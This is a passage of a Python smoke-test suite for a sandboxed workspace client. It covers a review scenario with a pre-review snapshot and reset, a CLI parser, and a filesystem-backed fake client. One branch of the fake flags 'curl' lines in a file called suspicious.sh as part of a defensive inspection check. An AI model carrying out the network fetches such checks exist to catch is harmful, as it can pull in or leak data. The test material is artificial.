        time.sleep(0.05)
        updated = pyro.update_workspace(alpha_id, labels={"branch": "alpha", "owner": "alice"})
        assert updated["labels"]["owner"] == "alice", updated
        time.sleep(0.05)
        pyro.write_workspace_file(alpha_id, "branch.txt", text="alpha\n")

        # Each workspace must still hold only its own branch marker.
        alpha_file = pyro.read_workspace_file(alpha_id, "branch.txt")
        beta_file = pyro.read_workspace_file(beta_id, "branch.txt")
        assert alpha_file["content"] == "alpha\n", alpha_file
        assert beta_file["content"] == "beta\n", beta_file

        time.sleep(0.05)
        pyro.write_workspace_file(alpha_id, "activity.txt", text="alpha was last\n")
        listed = pyro.list_workspaces()
        # Build the membership set once rather than once per listed entry.
        our_ids = set(workspace_ids)
        ours = [entry for entry in listed["workspaces"] if entry["workspace_id"] in our_ids]
        assert len(ours) == 2, listed
        assert ours[0]["workspace_id"] == alpha_id, ours
    finally:
        for workspace_id in reversed(workspace_ids):
            _safe_delete_workspace(pyro, workspace_id)
def _scenario_review_eval(pyro: Pyro, *, root: Path, environment: str) -> None:
    """Run the review-and-evaluation workflow against a seeded workspace.

    Seeds a checklist, an artifact and a ``review.sh`` script, then:

    1. takes a ``pre-review`` snapshot,
    2. reads the checklist through an interactive shell and closes the shell,
    3. runs the review script and expects success,
    4. overwrites the artifact, resets to ``pre-review`` and checks that the
       artifact content is restored,
    5. reruns the review and exports ``review-report.txt`` to
       ``root / "export"``.

    The shell (if still open) and the workspace are cleaned up on exit, even
    when an assertion fails.

    Args:
        pyro: Client used for every workspace operation.
        root: Scratch directory for this scenario (seed and export live here).
        environment: Environment name forwarded to workspace creation.

    Raises:
        AssertionError: If any observed result differs from the expectation.
    """
    seed_dir = root / "seed"
    export_dir = root / "export"
    _write_text(
        seed_dir / "CHECKLIST.md",
        "# Review checklist\n\n- confirm artifact state\n- export the evaluation report\n",
    )
    _write_text(seed_dir / "artifact.txt", "PASS\n")
    _write_text(
        seed_dir / "review.sh",
        "#!/bin/sh\n"
        "set -eu\n"
        "if grep -qx 'PASS' artifact.txt; then\n"
        " printf '%s\\n' 'review=pass' > review-report.txt\n"
        " printf '%s\\n' 'review passed'\n"
        "else\n"
        " printf '%s\\n' 'review=fail' > review-report.txt\n"
        " printf '%s\\n' 'review failed' >&2\n"
        " exit 1\n"
        "fi\n",
    )
    workspace_id: str | None = None
    shell_id: str | None = None
    try:
        workspace_id = _create_workspace(
            pyro,
            environment=environment,
            seed_path=seed_dir,
            name="review-eval",
            labels={"suite": USE_CASE_SUITE_LABEL, "use_case": "review-eval"},
        )
        _log(f"review-eval workspace_id={workspace_id}")
        baseline_snapshot = pyro.create_snapshot(workspace_id, "pre-review")
        assert baseline_snapshot["snapshot"]["snapshot_name"] == "pre-review", baseline_snapshot

        shell = pyro.open_shell(workspace_id)
        shell_id = str(shell["shell_id"])
        # The first read yields the cursor from which the command output is
        # read afterwards.
        initial = pyro.read_shell(
            workspace_id,
            shell_id,
            cursor=0,
            plain=True,
            wait_for_idle_ms=300,
        )
        pyro.write_shell(workspace_id, shell_id, input="cat CHECKLIST.md")
        read = pyro.read_shell(
            workspace_id,
            shell_id,
            cursor=int(initial["next_cursor"]),
            plain=True,
            wait_for_idle_ms=300,
        )
        assert "Review checklist" in str(read["output"]), read
        closed = pyro.close_shell(workspace_id, shell_id)
        assert bool(closed["closed"]) is True, closed
        # Mark the shell as handled so the cleanup path does not close it twice.
        shell_id = None

        evaluation = pyro.exec_workspace(workspace_id, command="sh review.sh")
        assert int(evaluation["exit_code"]) == 0, evaluation

        pyro.write_workspace_file(workspace_id, "artifact.txt", text="FAIL\n")
        reset = pyro.reset_workspace(workspace_id, snapshot="pre-review")
        assert reset["workspace_reset"]["snapshot_name"] == "pre-review", reset
        artifact = pyro.read_workspace_file(workspace_id, "artifact.txt")
        assert artifact["content"] == "PASS\n", artifact

        # The snapshot predates the first review run, so the report has to be
        # regenerated before it can be exported.
        rerun = pyro.exec_workspace(workspace_id, command="sh review.sh")
        assert int(rerun["exit_code"]) == 0, rerun
        export_path = export_dir / "review-report.txt"
        pyro.export_workspace(workspace_id, "review-report.txt", output_path=export_path)
        assert export_path.read_text(encoding="utf-8") == "review=pass\n"
    finally:
        if shell_id is not None and workspace_id is not None:
            try:
                pyro.close_shell(workspace_id, shell_id)
            except Exception as exc:
                # Best-effort cleanup: never mask the failure that brought us
                # here, but leave a trace so a leaked shell can be diagnosed.
                _log(f"review-eval close_shell cleanup failed: {exc!r}")
        _safe_delete_workspace(pyro, workspace_id)
def build_arg_parser() -> argparse.ArgumentParser:
    """Create the command-line parser for the use-case smoke runner.

    Returns:
        A parser exposing ``--scenario`` (restricted to ``USE_CASE_CHOICES``,
        defaulting to ``USE_CASE_ALL_SCENARIO``) and ``--environment``
        (defaulting to ``DEFAULT_USE_CASE_ENVIRONMENT``).
    """
    cli = argparse.ArgumentParser(
        description="Run real guest-backed workspace use-case smoke scenarios.",
        prog="workspace_use_case_smoke",
    )
    # Registration order is kept because it determines the order in --help.
    option_table = (
        (
            "--scenario",
            {
                "choices": USE_CASE_CHOICES,
                "default": USE_CASE_ALL_SCENARIO,
                "help": "Use-case scenario to run. Defaults to all scenarios.",
            },
        ),
        (
            "--environment",
            {
                "default": DEFAULT_USE_CASE_ENVIRONMENT,
                "help": "Curated environment to use for the workspace scenarios.",
            },
        ),
    )
    for flag, settings in option_table:
        cli.add_argument(flag, **settings)
    return cli
class _FakePyro:
    """Filesystem-backed stand-in for ``Pyro`` used by the smoke-runner tests.

    Every workspace is a pair of directories below ``root``: a live tree and a
    baseline copy. Commands are never executed; ``exec_workspace`` and
    ``start_service`` recognise the exact command strings used by the smoke
    scenarios and simulate their effects on the live tree.
    """

    def __init__(self, root: Path) -> None:
        self._root = root
        self._workspaces: dict[str, _FakeWorkspace] = {}
        self._workspace_counter = 0
        self._shell_counter = 0
        # Logical clock: each mutating call advances it by one so that
        # activity ordering is deterministic regardless of wall-clock time.
        self._clock = 0.0

    def _tick(self) -> float:
        """Advance the logical clock and return the new timestamp."""
        self._clock += 1.0
        return self._clock

    def _workspace_dir(self, workspace_id: str) -> Path:
        """Return the directory that holds all state for ``workspace_id``."""
        return self._root / workspace_id

    def _resolve_workspace(self, workspace_id: str) -> _FakeWorkspace:
        """Look up a workspace; raises ``KeyError`` for unknown ids."""
        return self._workspaces[workspace_id]

    def _workspace_path(self, workspace: _FakeWorkspace, path: str) -> Path:
        """Map a guest path (absolute under ``/workspace`` or relative) to disk."""
        if path.startswith("/workspace/"):
            relative = path.removeprefix("/workspace/")
        elif path == "/workspace":
            relative = ""
        else:
            relative = path
        return workspace.root / relative

    def _copy_tree_contents(self, source: Path, destination: Path) -> None:
        """Copy the children of ``source`` into ``destination``.

        The destination may already exist (it is created with
        ``exist_ok=True``), so sub-directories are merged rather than
        rejected when they are already present.
        """
        destination.mkdir(parents=True, exist_ok=True)
        for child in source.iterdir():
            target = destination / child.name
            if child.is_dir():
                shutil.copytree(child, target, dirs_exist_ok=True)
            else:
                shutil.copy2(child, target)

    def _reset_tree(self, destination: Path, source: Path) -> None:
        """Replace ``destination`` with a fresh copy of ``source``."""
        if destination.exists():
            shutil.rmtree(destination)
        shutil.copytree(source, destination)

    def _diff_changed(self, workspace: _FakeWorkspace) -> bool:
        """Return True when the live tree differs from the baseline tree.

        Only regular files are compared: first the sets of relative paths,
        then the byte content of each file.
        """
        current_paths = {
            path.relative_to(workspace.root)
            for path in workspace.root.rglob("*")
            if path.is_file()
        }
        baseline_paths = {
            path.relative_to(workspace.baseline_root)
            for path in workspace.baseline_root.rglob("*")
            if path.is_file()
        }
        if current_paths != baseline_paths:
            return True
        return any(
            (workspace.root / relative).read_bytes()
            != (workspace.baseline_root / relative).read_bytes()
            for relative in current_paths
        )

    def create_workspace(
        self,
        *,
        environment: str,
        seed_path: Path,
        name: str | None = None,
        labels: dict[str, str] | None = None,
        network_policy: str = "off",
    ) -> dict[str, Any]:
        """Create a workspace whose live and baseline trees copy ``seed_path``."""
        self._workspace_counter += 1
        workspace_id = f"ws-{self._workspace_counter}"
        workspace_dir = self._workspace_dir(workspace_id)
        workspace_root = workspace_dir / "workspace"
        baseline_root = workspace_dir / "baseline"
        self._copy_tree_contents(Path(seed_path), workspace_root)
        self._copy_tree_contents(Path(seed_path), baseline_root)
        stamp = self._tick()
        workspace = _FakeWorkspace(
            workspace_id=workspace_id,
            root=workspace_root,
            baseline_root=baseline_root,
            environment=environment,
            network_policy=network_policy,
            name=name,
            labels=dict(labels or {}),
            created_at=stamp,
            last_activity_at=stamp,
        )
        # The baseline doubles as the default reset target.
        workspace.snapshots["baseline"] = baseline_root
        self._workspaces[workspace_id] = workspace
        return {"workspace_id": workspace_id}

    def delete_workspace(self, workspace_id: str) -> dict[str, Any]:
        """Forget the workspace and remove its directory tree."""
        workspace = self._workspaces.pop(workspace_id)
        shutil.rmtree(self._workspace_dir(workspace.workspace_id), ignore_errors=True)
        return {"workspace_id": workspace_id, "deleted": True}

    def status_workspace(self, workspace_id: str) -> dict[str, Any]:
        """Return metadata for one workspace without touching its activity time."""
        workspace = self._resolve_workspace(workspace_id)
        return {
            "workspace_id": workspace_id,
            "network_policy": workspace.network_policy,
            "name": workspace.name,
            "labels": dict(workspace.labels),
            "last_activity_at": workspace.last_activity_at,
        }

    def update_workspace(self, workspace_id: str, *, labels: dict[str, str]) -> dict[str, Any]:
        """Merge ``labels`` into the workspace labels and bump its activity time."""
        workspace = self._resolve_workspace(workspace_id)
        workspace.labels.update(labels)
        workspace.last_activity_at = self._tick()
        return {"workspace_id": workspace_id, "labels": dict(workspace.labels)}

    def list_workspaces(self) -> dict[str, Any]:
        """List workspaces, most recently active first.

        Ties are broken by newest creation time and then by workspace id.
        """
        workspaces = sorted(
            self._workspaces.values(),
            key=lambda item: (-item.last_activity_at, -item.created_at, item.workspace_id),
        )
        return {
            "count": len(workspaces),
            "workspaces": [
                {
                    "workspace_id": workspace.workspace_id,
                    "name": workspace.name,
                    "labels": dict(workspace.labels),
                    "environment": workspace.environment,
                    "state": "started",
                    "created_at": workspace.created_at,
                    "last_activity_at": workspace.last_activity_at,
                    "expires_at": workspace.created_at + 3600,
                    "command_count": 0,
                    "service_count": len(workspace.services),
                    "running_service_count": sum(
                        1
                        for service in workspace.services.values()
                        if service["state"] == "running"
                    ),
                }
                for workspace in workspaces
            ],
        }

    def exec_workspace(self, workspace_id: str, *, command: str) -> dict[str, Any]:
        """Simulate one of the known smoke commands.

        Raises:
            AssertionError: If ``command`` is not one the fake understands.
        """
        workspace = self._resolve_workspace(workspace_id)
        root = workspace.root
        stdout = ""
        stderr = ""
        exit_code = 0
        if command == "sh validate.sh":
            (root / "validation-report.txt").write_text("validation=pass\n", encoding="utf-8")
            stdout = "validated\n"
        elif command == "sh check.sh":
            value = (root / "message.txt").read_text(encoding="utf-8").strip()
            if value == "fixed":
                stdout = "fixed\n"
            else:
                stderr = f"expected fixed got {value}\n"
                exit_code = 1
        elif command == "sh -lc 'test -f .app-ready && cat service-state.txt'":
            # Honour both halves of the command: without the readiness marker
            # (or the state file) the probe fails instead of reporting state.
            state_file = root / "service-state.txt"
            if (root / ".app-ready").is_file() and state_file.is_file():
                stdout = state_file.read_text(encoding="utf-8")
            else:
                exit_code = 1
        elif "inspection-report.txt" in command:
            suspicious = (root / "suspicious.sh").read_text(encoding="utf-8").splitlines()
            report_lines = [
                f"{index}:curl"
                for index, line in enumerate(suspicious, start=1)
                if "curl" in line
            ]
            report_lines.append("network_policy=off")
            (root / "inspection-report.txt").write_text(
                "\n".join(report_lines) + "\n",
                encoding="utf-8",
            )
        elif command == "sh review.sh":
            artifact = (root / "artifact.txt").read_text(encoding="utf-8").strip()
            if artifact == "PASS":
                (root / "review-report.txt").write_text("review=pass\n", encoding="utf-8")
                stdout = "review passed\n"
            else:
                (root / "review-report.txt").write_text("review=fail\n", encoding="utf-8")
                stderr = "review failed\n"
                exit_code = 1
        else:
            raise AssertionError(f"unexpected exec command: {command}")
        workspace.last_activity_at = self._tick()
        return {
            "workspace_id": workspace_id,
            "exit_code": exit_code,
            "stdout": stdout,
            "stderr": stderr,
            "execution_mode": "guest_vsock",
        }

    def start_service(
        self,
        workspace_id: str,
        service_name: str,
        *,
        command: str,
        readiness: dict[str, Any] | None = None,
    ) -> dict[str, Any]:
        """Register a running service; ``sh serve.sh`` also writes its marker files."""
        workspace = self._resolve_workspace(workspace_id)
        if command == "sh serve.sh":
            (workspace.root / "service-state.txt").write_text("service=ready\n", encoding="utf-8")
            (workspace.root / ".app-ready").write_text("", encoding="utf-8")
            stdout = "service started\n"
        else:
            stdout = ""
        workspace.services[service_name] = {
            "state": "running",
            "stdout": stdout,
            "readiness": readiness,
        }
        workspace.last_activity_at = self._tick()
        return {
            "workspace_id": workspace_id,
            "service_name": service_name,
            "state": "running",
            "command": command,
            "cwd": "/workspace",
            "execution_mode": "guest_vsock",
            "readiness": readiness,
        }

    def logs_service(
        self,
        workspace_id: str,
        service_name: str,
        *,
        tail_lines: int = 200,
    ) -> dict[str, Any]:
        """Return the recorded stdout of a service; ``tail_lines`` is only echoed."""
        workspace = self._resolve_workspace(workspace_id)
        service = workspace.services[service_name]
        return {
            "workspace_id": workspace_id,
            "service_name": service_name,
            "state": service["state"],
            "stdout": service["stdout"],
            "stderr": "",
            "tail_lines": tail_lines,
            "truncated": False,
        }

    def stop_service(self, workspace_id: str, service_name: str) -> dict[str, Any]:
        """Mark a service as stopped and bump the workspace activity time."""
        workspace = self._resolve_workspace(workspace_id)
        workspace.services[service_name]["state"] = "stopped"
        workspace.last_activity_at = self._tick()
        return {"workspace_id": workspace_id, "service_name": service_name, "state": "stopped"}

    def list_workspace_files(
        self, workspace_id: str, *, path: str = "/workspace", recursive: bool = False
    ) -> dict[str, Any]:
        """List entries below ``path`` in a stable, sorted order.

        Entry paths are reported as POSIX-style guest paths under
        ``/workspace`` regardless of the host path separator.
        """
        workspace = self._resolve_workspace(workspace_id)
        target = self._workspace_path(workspace, path)
        found = target.rglob("*") if recursive else target.iterdir()
        # Directory iteration order is filesystem-dependent; sort so callers
        # (and assertions) see the same listing on every host.
        ordered = sorted(found, key=lambda item: item.relative_to(workspace.root).parts)
        entries: list[dict[str, Any]] = [
            {
                "path": f"/workspace/{entry.relative_to(workspace.root).as_posix()}",
                "artifact_type": "directory" if entry.is_dir() else "file",
                "size_bytes": entry.stat().st_size if entry.is_file() else 0,
                "link_target": None,
            }
            for entry in ordered
        ]
        return {"workspace_id": workspace_id, "entries": entries}

    def read_workspace_file(self, workspace_id: str, path: str) -> dict[str, Any]:
        """Read a UTF-8 file from the live tree; does not bump activity time."""
        workspace = self._resolve_workspace(workspace_id)
        target = self._workspace_path(workspace, path)
        content = target.read_text(encoding="utf-8")
        return {"workspace_id": workspace_id, "path": path, "content": content}

    def write_workspace_file(self, workspace_id: str, path: str, *, text: str) -> dict[str, Any]:
        """Write ``text`` as UTF-8, creating parent directories as needed."""
        workspace = self._resolve_workspace(workspace_id)
        target = self._workspace_path(workspace, path)
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(text, encoding="utf-8")
        workspace.last_activity_at = self._tick()
        return {"workspace_id": workspace_id, "path": path, "bytes_written": len(text.encode())}

    def apply_workspace_patch(self, workspace_id: str, *, patch: str) -> dict[str, Any]:
        """Simulate the one patch the smoke suite applies.

        The patch text is not parsed: the fake only replaces ``broken`` with
        ``fixed`` in ``message.txt`` and echoes ``patch`` back.
        """
        workspace = self._resolve_workspace(workspace_id)
        target = workspace.root / "message.txt"
        original = target.read_text(encoding="utf-8")
        updated = original.replace("broken\n", "fixed\n")
        target.write_text(updated, encoding="utf-8")
        workspace.last_activity_at = self._tick()
        return {"workspace_id": workspace_id, "changed": updated != original, "patch": patch}

    def diff_workspace(self, workspace_id: str) -> dict[str, Any]:
        """Report whether the live tree differs from the baseline."""
        workspace = self._resolve_workspace(workspace_id)
        return {"workspace_id": workspace_id, "changed": self._diff_changed(workspace)}

    def export_workspace(
        self,
        workspace_id: str,
        path: str,
        *,
        output_path: Path,
    ) -> dict[str, Any]:
        """Copy a file or directory from the live tree to ``output_path``."""
        workspace = self._resolve_workspace(workspace_id)
        source = self._workspace_path(workspace, path)
        output_path = Path(output_path)
        output_path.parent.mkdir(parents=True, exist_ok=True)
        if source.is_dir():
            shutil.copytree(source, output_path)
            artifact_type = "directory"
        else:
            shutil.copy2(source, output_path)
            artifact_type = "file"
        return {
            "workspace_id": workspace_id,
            "workspace_path": path,
            "output_path": str(output_path),
            "artifact_type": artifact_type,
        }

    def create_snapshot(self, workspace_id: str, snapshot_name: str) -> dict[str, Any]:
        """Store a copy of the live tree under ``snapshot_name``."""
        workspace = self._resolve_workspace(workspace_id)
        snapshot_root = self._workspace_dir(workspace_id) / f"snapshot-{snapshot_name}"
        self._reset_tree(snapshot_root, workspace.root)
        workspace.snapshots[snapshot_name] = snapshot_root
        return {
            "workspace_id": workspace_id,
            "snapshot": {"snapshot_name": snapshot_name, "kind": "named"},
        }

    def reset_workspace(self, workspace_id: str, *, snapshot: str = "baseline") -> dict[str, Any]:
        """Replace the live tree with the named snapshot (baseline by default)."""
        workspace = self._resolve_workspace(workspace_id)
        source = workspace.snapshots[snapshot]
        self._reset_tree(workspace.root, source)
        workspace.reset_count += 1
        workspace.last_activity_at = self._tick()
        return {
            "workspace_id": workspace_id,
            "reset_count": workspace.reset_count,
            "workspace_reset": {"snapshot_name": snapshot},
        }

    def open_shell(self, workspace_id: str, **_: Any) -> dict[str, Any]:
        """Open a fake shell with an empty output buffer."""
        workspace = self._resolve_workspace(workspace_id)
        self._shell_counter += 1
        shell_id = f"shell-{self._shell_counter}"
        workspace.shells[shell_id] = _FakeShell()
        return {"workspace_id": workspace_id, "shell_id": shell_id, "state": "running"}

    def read_shell(
        self,
        workspace_id: str,
        shell_id: str,
        *,
        cursor: int = 0,
        plain: bool = False,
        wait_for_idle_ms: int | None = None,
    ) -> dict[str, Any]:
        """Return buffered shell output from ``cursor`` to the end of the buffer."""
        workspace = self._resolve_workspace(workspace_id)
        shell = workspace.shells[shell_id]
        output = shell.buffer[cursor:]
        next_cursor = len(shell.buffer)
        return {
            "workspace_id": workspace_id,
            "shell_id": shell_id,
            "state": "running",
            "cursor": cursor,
            "next_cursor": next_cursor,
            "output": output,
            "plain": plain,
            "wait_for_idle_ms": wait_for_idle_ms,
            "truncated": False,
        }

    def write_shell(self, workspace_id: str, shell_id: str, *, input: str) -> dict[str, Any]:
        """Feed input to a fake shell; only ``cat CHECKLIST.md`` produces output."""
        workspace = self._resolve_workspace(workspace_id)
        shell = workspace.shells[shell_id]
        if input == "cat CHECKLIST.md":
            shell.buffer += (workspace.root / "CHECKLIST.md").read_text(encoding="utf-8")
        workspace.last_activity_at = self._tick()
        return {"workspace_id": workspace_id, "shell_id": shell_id}

    def close_shell(self, workspace_id: str, shell_id: str) -> dict[str, Any]:
        """Drop the shell if present; closing an unknown shell is not an error."""
        workspace = self._resolve_workspace(workspace_id)
        workspace.shells.pop(shell_id, None)
        return {"workspace_id": workspace_id, "shell_id": shell_id, "closed": True}
def test_use_case_parser_exposes_all_scenarios() -> None:
    """The ``--scenario`` option must offer exactly ``USE_CASE_CHOICES``."""
    cli = build_arg_parser()
    # argparse has no public accessor for registered actions, hence ``_actions``.
    scenario_candidates = (
        candidate
        for candidate in cli._actions
        if getattr(candidate, "dest", None) == "scenario"
    )
    scenario_action = next(scenario_candidates)
    exposed = cast(tuple[Any, ...], scenario_action.choices)
    assert tuple(exposed) == USE_CASE_CHOICES